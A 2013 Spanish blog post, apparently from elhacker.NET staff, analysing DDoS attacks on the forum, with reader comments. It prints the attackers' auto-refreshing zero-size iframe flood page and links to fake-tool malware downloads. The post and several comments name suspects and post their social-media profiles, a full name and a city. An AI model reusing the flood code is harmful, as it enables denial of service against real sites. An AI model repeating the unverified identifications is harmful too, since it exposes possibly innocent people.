viernes, 10 de mayo de 2013

Vuelven a atacar elhacker.NET

Esta última semana el foro de elhacker.NET ha recibido unos sospechosos ataques DoS y DDoS durante la noche. Descubramos ahora quiénes son y cómo lo hacen (bueno, cómo intentan hacerlo).

Imagen con picos de 3,400 qps (Queries per second, consultas por segundo).





Revisando los logs del apache ví muchas peticiones masivas al index del foro con el HTTP_Referrer de:

  • http://mundovirtualxat.webs.com/noob/7.htm
  • http://mundovirtualxat.webs.com/noob/xp.htm

Mirando el código fuente:

view-source:http://mundovirtualxat.webs.com/noob/7.htm
view-source:http://mundovirtualxat.webs.com/noob/xp.htm

Podemos  ver como los atacantes están llamando a la botnet para que visite esa página y así amplificar el ataque. Es la misma técnica que usa Loic, creando múltiples iframes de 0x0 y encima refrescandose cada 1 segundo.

<meta content="1;" http-equiv="REFRESH"></meta> 
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>
<iframe height="0" src="http://foro.elhacker.net/index.php" width="0"> </iframe>


Mirando la página principal de su web http://mundovirtualxat.webs.com/

Podemos ver cómo en una captura de pantalla aparece una aplicación en Visual Basic que dice:

  • Super BotNet by NMR & Calco


Simplemente buscando en internet por "The Duguies" y RD (República Dominicana) podemos encontrar  su perfil en Badoo:

http://badoo.com/flowflash/photos/

Y vemos que usa el "nickname"  flowflash:

http://flowflash.webs.com/contacto.html

Y vemos que también son de la República Dominicana y con los mismos nicks. Qué casualidad.

Menudo error de principiante....

No cansados con ser descubiertos entro en su chat (aparece la url en la página principal de mundovirtualxat.webs.com)

http://xat.com/Duguies

Hoy viernes 10 de mayo también hemos recibido un ataque de casi 90Mb/s



 Lo que ellos no deben saber es que la conexión del servidor es de 10Gbps
ixgbe eth0: detected SFP+: 3
ixgbe eth0: NIC Link is Up 10 Gbps, Flow Control: RX/TX

Nos ha gustado tanto que hemos hecho un vídeo del ataque, primero del tráfico normal del foro (duración de minuto aproximadamente y luego el ataque).




También están atacando otro sitios, cómo otros foros chilenos, whk, cl-security, etc y ellos missos cuelgan un vídeo usando el canal:


¿Cómo propagaban el virus para obterner más zombies para la Botnet?

Al igual que otros atacantes han usado vídeos de youtube para poner en la descarga una supuesta herramienta para hackear facebook. Muy original ¿no?

Ya les han borrado el vídeo que reportamos a Youtube

Como hackear Facebook real y facil ,seguir los paso 2013
Este vídeo se ha retirado debido a una infracción de la política de YouTube relacionada con el spam, con las estafas y con el contenido comercial engañoso.

El vídeo tenía más de 30.000 visitas.

Y los links de las descargas de los programas eran:

y links borrados de los programas con los que infectaban:
http://www.mediafire.com/?17f58jpaashjt2c
http://www.mediafire.com/?r77qllfs70d73df

Skype Falso v1.5.SETUP.rar

El canal de youtube que estaban usando era:
http://www.youtube.com/user/DuguiesRD


35 comentarios:

  1. Fernando M10 de mayo de 2013 a las 21:03

    Me ha gustado mucho este reportaje jeje

    ResponderEliminar
  2. Unknown11 de mayo de 2013 a las 1:30

    Cojonudo chicos. Así se hace. . . ....

    ResponderEliminar
  3. Arthas11 de mayo de 2013 a las 1:55

    Son los mejores

    ResponderEliminar
  4. Anónimo11 de mayo de 2013 a las 9:37

    ¡Qué pillada! jajaja ¡Muy buenos! ;-)

    ResponderEliminar
  5. Anónimo11 de mayo de 2013 a las 15:50

    Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  6. Anónimo11 de mayo de 2013 a las 15:52

    yo solo digo que este texto sobre delitos informaticos en republica dominicana esta interesante
    http://www.oas.org/juridico/PDFs/repdom_ley5307.pdf

    mas aun si todavia tienen los ejecutables de la botnet

    jeje saludos

    ResponderEliminar
  7. Unknown11 de mayo de 2013 a las 21:49

    muy bueno la verdad muy interesante xD

    ResponderEliminar
  8. Unknown11 de mayo de 2013 a las 23:32

    https://www.youtube.com/watch?v=BJeC1fPAFWs

    Juackers : 3

    ResponderEliminar
  9. xavi12 de mayo de 2013 a las 22:56

    Vaya con los tios estos... xDD

    No tienen ni puta idea...

    PD: Me ha molado un montón el video del "ataque" DDoS!

    ResponderEliminar
  10. Unknown13 de mayo de 2013 a las 3:45

    acá tengo más datos sobre ese tipo
    Martin Espejo Umeres
    Cuando ataco Indetectables:
    http://www.indetectables.net/viewtopic.php?t=37886&p=357801
    sus paginas webs:
    http://v3nen0.com
    v3nen0labs.com
    securitylabs.info
    v3nen0labs.net
    v3nen0labs.org
    v3nen0labs.ws

    Por lo que estaba averiguando anda metido en el CARDING.

    su facebook:
    https://www.facebook.com/cod3dz3ro?ref=tn_tnmn
    su fanpage:
    https://www.facebook.com/V3nen0Labs?fref=ts
    su grupo:
    https://www.facebook.com/groups/419870534733048/?fref=ts


    seria bueno denunciarlo se la pasa jugando, dejando fuera de servicio webs.

    ResponderEliminar
  11. Anónimo13 de mayo de 2013 a las 11:29

    el brujo el mentiroso

    http://elhackerblog.wordpress.com/2013/05/13/elhacker-net-el-ddos-de-mayo-el-gran-fraude-de-el-brujo/

    ResponderEliminar
  12. Popi-popitas13 de mayo de 2013 a las 11:34

    contigo tuvo que dar el lamer Brujo... jajajaja, un saludo.

    ResponderEliminar
  13. Unknown14 de mayo de 2013 a las 16:01

    Jajajjaaj muy bueno!!

    10GB/s!!!! Cuanto pagais??? Proveedor ect..

    Saludos Alex

    ResponderEliminar
  14. Juan Michel14 de mayo de 2013 a las 16:46

    Que opinana sobre esto:

    http://elhackerblog.wordpress.com/2013/05/13/elhacker-net-el-ddos-de-mayo-el-gran-fraude-de-el-brujo/

    Dice que toda esa info es falsa, y ponen ciertas aclaraciones. Yo no me inclino ni por un lado ni por otro, pero es bueno escuchar las dos tonadas de la campana.

    ResponderEliminar
  15. Shelley2115 de mayo de 2013 a las 0:46

    Excelente articulo, me ha gustado mucho....es que algunos quieren darselas de hack y resultan solo lammers, algunos dicen que es comenzar un sueño que lleva a la realidad, muchos comienzan de esa manera, solo que la otra cara es que no debes jugar con fuego sin saber cuidarte. La realidad es una..tuvieron coraje los chicos en atacar una pagina como esta. Oye y cuanto pagas por los 10Gbps..dios mi conexion da pena delante de esto. :)

    ResponderEliminar
  16. Unknown15 de mayo de 2013 a las 11:31

    el DDoS de Mayo. el gran fraude de "el brujo" http://wp.me/p3wwKK-2 ¿ESTO ES CIERTO?

    ResponderEliminar
  17. Unknown15 de mayo de 2013 a las 17:20

    oye brujo, y a todas estas, ¿cual es el ataque que más "te ha gustado"? con eso me refiero a tal vez el más sotisticado, o el más difícil de interceptar, o de quien no hayas podido recuperar información personal, que te haya asustado mejor dicho...

    ResponderEliminar
  18. Unknown15 de mayo de 2013 a las 18:23

    @Pruebas Pentester yo creo lo que dice ese enlace es mentira, se trata de un blog nuevo, sin autoridad y que solo tiene esa entrada, yo diría que lo hicieron los mismos del ataque, que al ser pillados y desenmascarados intentaron hacernos creer que toda esta información que nos había presentado "el Brujo" es mentira.

    ResponderEliminar
  19. Unknown16 de mayo de 2013 a las 0:41

    Uno de los atacantes, como todo Noob tiene todos sus datos en su facebook:

    http://www.facebook.com/ricardo.rayoayala

    ResponderEliminar
  20. NauTiluS16 de mayo de 2013 a las 15:58

    Vergüenza me dan. Soy dominicano y visito este foro, no todos los días, pero si cada cierto tiempo y no se me ocurriría atacarlo, ya que es como mi casa para aprender algo nuevo, con cada visita.

    Deberían darle cárcel para que aprendan.

    pd: Un reportaje a nivel profesional :) me ha gustado mucho.

    ResponderEliminar
  21. Anónimo16 de mayo de 2013 a las 16:57

    consiganme el fb de la tipa de la ultima foto que esta buena!!!! como se llama :x !!

    ResponderEliminar
  22. Anonymous17 de mayo de 2013 a las 9:14

    Bueno gente hay un chaval que tambien ataco o por lo menos va presumiendo de que tambien ataco,es un tal spelinax,aqui en la foto de abajo tendreis mas informacion de el:
    https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn1/558094_232403940231244_1002104421_n.jpg
    Me gustaria añadirle que vive en zamora.

    ResponderEliminar
  23. DaniGG17 de mayo de 2013 a las 16:33

    Unos 17 te puedo pasar info de el ...etc te paso un video de el fardando http://www.youtube.com/watch?v=wNY77IiIPiA , bueno como habras visto es un lammer, o kiddie peor, si quieres agregame a skype o a mi cuenta personal de gmail o tuenti, te pasare de donde es...etc :) Salu2 Brujo, salu2 de Torrascrack tambien

    ResponderEliminar
  24. DaniGG17 de mayo de 2013 a las 17:05

    te dejo mi pagina y puedes ver la información que colge de el.

    http://thehackerwars.blogspot.com.es/

    ResponderEliminar
  25. Unknown18 de mayo de 2013 a las 7:32

    Siento deciros que los datos son falsos estan trucadas,y por dejar mi perfil, prepararos para mis abogados, por que os pienso llevar a la ruina.

    La denuncia ya esta hecha.

    ResponderEliminar
  26. h3ku19 de mayo de 2013 a las 1:52

    Buenas respecto al mensaje de Nuggetxley hacen carding, de hecho accedieron a una de mis cuentas de 1&1, se ve que colaron un rat o un stealer en alguno de los ordenadores desde los que inicie sesion.

    Esos dominios los registraron con mi cuenta ademas de contratar varios servidores, la denuncia la llevara a comisaria en unos dia.

    ResponderEliminar
  27. h3ku19 de mayo de 2013 a las 1:56

    Añado su facebook.
    https://www.facebook.com/V3nen0Labs
    Los muy inutiles publicaron capturas de lo que contrataron con mi cuenta, no solo eso, si no que lo reconocieron por email.

    ResponderEliminar
  28. Ricardo Muñoz22 de mayo de 2013 a las 5:14

    que entrada tan buena.
    He sacado varios tutoriales de esta web, esta excelente, gracias por todo.

    ResponderEliminar
  29. Realidad23 de mayo de 2013 a las 22:30

    Chicos un reportaje increíble... Saludos desde Chile... y como siempre he dicho... hay que ser muy estupido para atacar una web de hackers...

    ResponderEliminar
  30. Adry24 de mayo de 2013 a las 12:22

    que grande , acabo de conocer la web y me encuentro con esto.
    Ya tenéis un nuevo seguidor

    ResponderEliminar
  31. Anónimo27 de mayo de 2013 a las 15:39

    Hay que ser idiotas para atacar una pagina de hackers. Y mas si no tienes ni idea jajaja
    Muy bueno el reportaje.

    ResponderEliminar
  32. El loco de la portería29 de mayo de 2013 a las 9:39

    No tienen ni idea. ¿A quién cojones se le ocurre atacar a sitios web para hackers?

    ResponderEliminar
  33. Unknown7 de junio de 2013 a las 21:46

    Que grande, la verdad cada vez flipo mas contigo.

    ResponderEliminar
  34. Boris3 de julio de 2013 a las 14:11

    Realmente muy bueno!
    Yo estoy estudiando informática, espero algún dia ser tan bueno como ustedes!

    ResponderEliminar
  35. Unknown4 de julio de 2013 a las 8:07

    Opino que esta mal que publiquen datos personales de sospechosos, no hay seguridad de que sea culpable, y el que intenta atacar a una pagina de informáticos, supongo que quiere probar sus conocimientos adquiridos recientemente o aumentar su ego.

    ResponderEliminar